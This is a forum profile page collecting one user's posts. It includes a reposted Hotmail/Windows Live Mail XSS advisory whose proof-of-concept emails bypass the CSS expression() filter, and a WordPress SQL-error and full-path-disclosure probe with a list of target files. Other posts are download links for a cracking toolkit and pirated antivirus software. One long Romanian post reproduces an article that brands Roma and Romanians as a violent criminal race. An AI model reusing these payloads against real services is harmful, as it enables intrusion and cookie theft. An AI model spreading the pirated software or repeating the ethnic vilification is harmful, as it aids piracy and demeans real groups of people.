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Everything posted by alexcargo

  1. Introduction: Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft. Details: Hotmail's filter identifies "expression()" syntax in a CSS attribute. According to Hasegawa Yosuke's post(http://archive.openmya.devnull.jp/2006.08/msg00369.html), in some character encodings(e.g. GB2312), we can substitute some special double-byte chars for the corresponding chars in "expression()". In this case, we can create a malformed CSS attribute, which Hotmail's filter fails to inspect and filter the "expression()" syntax. An example: Hotmail -------------------------------------------------- MIME-Version: 1.0 From: user<user@site.com> Content-Type: text/html; charset=GB2312 Subject: example <img id='sss'> <input id='ttt' value="javascript:alert('xss')"> <span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.sss.src=document.all.ttt.value)">exploited</span> . -------------------------------------------------- Windows Live Mail -------------------------------------------------- MIME-Version: 1.0 From: user<user@site.com> Content-Type: text/html; charset=GB2312 Subject: example <img id='sss'> <input id='ttt' value="javascript:alert('xss')"> <span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span> . -------------------------------------------------- the injected code inside the CSS attribute is responsible for -Getting cookies. -Potential web-based e-mail worm. Vender status: Microsoft was notified on Sep 25th, 2006. The bug is now fixed. Original advisory: http://applesoup.googlepages.com/hotmail_xss.txt
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  4. Hex Calculator for Programmers and Cryptanalysts Hpmbcalc is a programmable multiple-precision hex calculator with many utilities. With Hpmbcalc, you can easily perform a lot of big number math and encryption operations, such as: square root, modular inverse; hash, CRC, and check sum make; pseudo-random number generation; primality test; hex, dec, oct, bin conversion; etc. Download: [url]http://www.mytempdir.com/1013345[/url] Unul dintre cele mai bune calculatoare pentru programare ENjoy
  5. DLL to Lib is a magical tool which can convert a DLL file into its equivalent static library file so that you can distribute your applications without the DLLs. ============= Main Features ============= - Convert DLL file to its equivalent static library. In the conversion process, a programming interface identical to the export functions in the DLL is introduced for developers. And the necessary symbol tables, string tables and reference tables are also recontructed from the DLL to make a valid and portable static library. - Can convert all 32-bit DLLs developed by different tools. - Integrate "Import Library Reference Information Generator" to process the reference to standard libraries. - Integrate "Symbol Finder" for you to find the detail information about a special symbol or a class of symbols. Download: http://www.mytempdir.com/1012265 ENjoy
  6. Ãsta e titlul “faimosului” articol din Il Tempo, apãrut pe 3 octombrie ºi scris de AUGUSTO PARBONI . Din câte aflu ºi eu din Italia, de la douã foste colege de facultate, nu lipsesc de la TV, în fiecare zi, “rubrici” cu infracþiunile cetãþenilor români prezenþi în Cizmã. Conform statisticilor poliþiei italiene în topul infracþiunilor sunt nigerienii, senegalezii ºi italienii, dar se pare cã e mai “interesant” sã se vorbeascã despre “infractorii români”. De fapt, toatã lumea ºtie cã în majoritatea cazurilor e vorba de ÞIGANI, dar din anumite motive TREBUIE sã se spunã cã sunt români. Este considerata rasa cea mai violenta, periculoasa, capabila de a ucide pentru cativa bani. E capabila de a face furturi de milioane datorita cunoasterii unor tehnologii . Nu are frica de nimic, dispretuieste viata femeilor si a copiilor care nu ajung la varsta de 10 ani. Si culmea in curand va intra in UE. Sunt romanii, cetatenii Romaniei, care de ani terorizeaza tara noastra. Persoane ce vand vise care apoi se transforma in sclavie. Actioneaza mereu in grup pentru a finaliza numeroasele activitati criminale:De la prostitutie la rapiri in vile, de la clonari de carti de credit la imigratie clandestina. Este in capacitatea lor de a face trafic ilegal in Italia cu profituri atat de mari, ca a ridicat “antenele” criminalilor italieni, combinand adevarate parteneriate romano-italiane. Majoritatea romanilor ajunsi in Italia clandestin sunt capabili de a face sechestrari de persoane, rapiri si jafuri in vile, de a trai in umbra pentru a gestiona prostituatele conationale aduse in marile metropole cu promisiunea de a le face ingrijitoare. Se numeste “peste” (de el scris la feminin), este cel care profita de fete, le bate, le violeaza si le face sclave. Romanii sunt de asemenea maestri acrobati, reusesc sa intre in casa escaladand peretii cei mai abrupti, de obicei inarmati cu arme albe: doar in primele 7 luni ale acestui an au fost arestati 38 de romani responsabili de furturi in vile. Mintea criminala a acestor banditi este capabila de asemenea sa inventeze sisteme ultra-tehnologice de supt bani din conturile curente ale italienilor. In diverse cazuri, prin intermediul unei memorii instalate in casele Pos ale benzinariilor sau supermarketurilor, cu ajutorul tehnologiei Bluetooth, reusesc sa afle codurile secrete ale unui numar de mii de carti de credit si bancomat, din care apoi extrag bani, fac cumparaturi sau fac copii ale cardurilor pentru ale distribui conationalilor lor clandestini din diverse tari pe teritoriul Europei. Femeia romanca, cand reuseste sa nu ajunga in mainile “patronului”, cu frumusetea ei din Est reuseste sa incante batrani bogati, sa ii faca sa sa casatoreasca cu ele pentru a obtine cetatenia, si, de ce nu, contul in banca.
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  9. This is the most wanted Reverse Engineering Kit! There are Tons of Tools to help you learn the art of changing a program! Section of Tools included: 1. Analyzers 2. Crackers 3. Debuggers 4. Decompilers 5. Disassemblers 6. Monitors 7. Packers 8. Patchgens 9. Unpackers Download: http://www.filefactory.com/file/8a4dbe New Link: http://www.filefactory.com/file/305adf BIg Pack 289.03 MB ENjoy
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  11. Trend Micro™ PC-cillin™ Internet Security is the first personal Internet security solution specifically designed to extend desktop security to your home and wireless networks. Trend Micro PC-cillin Internet Security 15 combines award-winning antivirus security and a personal firewall-for comprehensive protection against viruses, worms, Trojans, and hackers. It also detects and removes spyware and blocks spam. It even guards against identity theft by blocking phishing and pharming attacks. Plus, PC-cillin protects your wireless network with Wi-Fi Intrusion Detection, an innovative security feature that alerts you when an intruder uses your Wi-Fi connection. Key Features of PC-cillin Internet Security 2007: * Advanced Parental Controls. Parental Controls allow you to manage your children’s Web activity by blocking Web sites and inappropriate content. You can even create different settings for each member of your family. * Comprehensive Antivirus Security. PC-cillin detects and removes viruses from emails, Internet downloads, removable media, and your PC. The improved Outbreak Warning System sends alerts to warn you of new threats, and security updates are automatically deployed as soon as they are available. * Enhanced Personal Firewall. The personal firewall prevents intrusion from hackers, and blocks network viruses, like the well-known ZOTOB worm, which targets network vulnerabilities. * Home Network Control. A centralized management console makes it easy to configure, update, and manage all aspects of security for every PC on your home network—wherever PC-cillin 15 is installed. A Security Expert Services button links to a security blog, virus maps, and other tools to give you all the information you need. * Improved Spam Filtering. Advanced spam-filtering technology blocks spam from flooding your inbox, and new integration with Microsoft™ Outlook™ makes it easy to set preferences. Plus, new user-friendly tools and more reports make it very simple to view and manage. * Phishing Fraud Defense. URL filtering, anti-spam, and patent-pending technologies work together to block fraudulent Web sites, phishing emails, and pharming attacks—scams designed to financial data, user names, and passwords. The Anti-Fraud Wizard makes it easy to configure, and the new Anti-Fraud Toolbar helps you avoid scams by displaying a credibility rating of Web sites in real time. * Powerful Spyware Protection. Trend Micro’s leading anti-spyware technology blocks spyware and grayware in real time. Plus, manual and scheduled scans detect and remove spyware that is already installed on your PC. New Exception Lists and improved Quarantine Management give you more control to keep, delete or restore programs. * Vulnerability Assessment. PC-cillin performs regular scans of your computer, alerts you to operating system/browser vulnerabilities, and provides one-click access to Windows Update. * Wi-Fi Intrusion Detection. The industry’s first alert system for wireless home networks is now faster and better, sending rapid alerts as soon as an unauthorized user intrudes your wireless network. Version 2007 includes anti-fraud protection against phishing and pharming and cellphone security. Download: http://rapidshare.de/files/33948872/PCCillin15001329.rar.html
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  13. September 2006: Version 8.0 =========================== - Several cosmetic changes has been made in the News administration - Added a Publish Now function for all Scheduled News listed in the main administration area - Banners list in Advertising administration module now are ordered by position and banner name - Advertising clients list is now ordered by client name in Advertising module's administration - Forums, Members List and Private Messages modules are now not so dependent from core system. Many files has been moved from /includes/ folder to /modules/Forums/includes/ - Added new BBtoNuke (phpBB Forums port) version 2.20 - Removed useless and not working search engine links from Downloads and Web Links modules search result pages - Added a new function in mainfile called info_box() which creates a nice message box with a related graphic. Values for the graphic (located in /images/system folder) are: warning, caution, tip and note - Cosmetic changes to Surveys module. Last 5 polls block now goes under the current results block - Minor cosmetic changes to Feedback module - Minor cosmetic changes to Add New Download form display in Downloads module - Minor cosmetic changes to IP Ban system list display - Several cosmetic changes in Submit News module - Added duplicate title and story text check in news submissions - Added a new DoS/Flood attack protection that prevents multiple pages views in few seconds - Cosmetic changes to Downloads module administration. - Changed the display list method of new submitted files in Downloads module administration by a single selection with the title and a separated validation page for each new file has been added - Added installation system in /install/ folder. (Based on Joomla Web Installer) - Fixed a bug in the client login function in Advertising module (Thanks to keg01) - Increased Advertising client cookie life from 1 hour to 24 hours - Minor optimizations in HTTP Referers system display - Fixed a bad use of define(INSIDE_MOD) in the mainfile.php that made useless this feature - Added a new redirection system to be used by admin to not reveal as referer the admin filename when clicking on a link Download: http://rapidshare.de/files/33756179/PHP-Nuke.v8.0.zip.html enjoy
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  16. http://localhost/wordpress/index.php?paged=-1 WordPress database error: [Erreur de syntaxe pr?s de '-20, 10' ? la ligne 1] SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <= '2006-06-29 12:46:59' AND (post_status = "publish") AND post_status != "attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT -20, 10 ~ Full path ~ /wp-settings.php /wp-admin/admin-footer.php /wp-admin/admin-functions.php /wp-admin/edit-form.php /wp-admin/edit-form-advanced.php /wp-admin/edit-form-comment.php /wp-admin/edit-link-form.php /wp-admin/edit-page-form.php /wp-admin/menu.php /wp-admin/menu-header.php /wp-admin/upgrade-functions.php /wp-admin/upgrade-schema.php /wp-admin/import/blogger.php /wp-admin/import/dotclear.php /wp-admin/import/livejournal.php /wp-admin/import/mt.php /wp-admin/import/rss.php /wp-admin/import/textpattern.php /wp-content/plugins/hello.php /wp-content/plugins/wp-db-backup.php /wp-content/plugins/akismet/akismet.php /wp-content/themes/classic/index.php /wp-content/themes/classic/comments.php /wp-content/themes/classic/comments-popup.php /wp-content/themes/classic/footer.php /wp-content/themes/classic/header.php /wp-content/themes/classic/sidebar.php /wp-content/themes/default/index.php /wp-content/themes/default/404.php /wp-content/themes/default/archive.php /wp-content/themes/default/archives.php /wp-content/themes/default/attachment.php /wp-content/themes/default/comments-popup.php /wp-content/themes/default/footer.php /wp-content/themes/default/functions.php /wp-content/themes/default/header.php /wp-content/themes/default/links.php /wp-content/themes/default/page.php /wp-content/themes/default/search.php /wp-content/themes/default/searchform.php /wp-content/themes/default/sidebar.php /wp-content/themes/default/single.php /wp-includes/default-filters.php /wp-includes/kses.php /wp-includes/locale.php /wp-includes/rss-functions.php /wp-includes/template-loader.php /wp-includes/vars.php /wp-includes/wp-db.php poate afecta si alte versiuni
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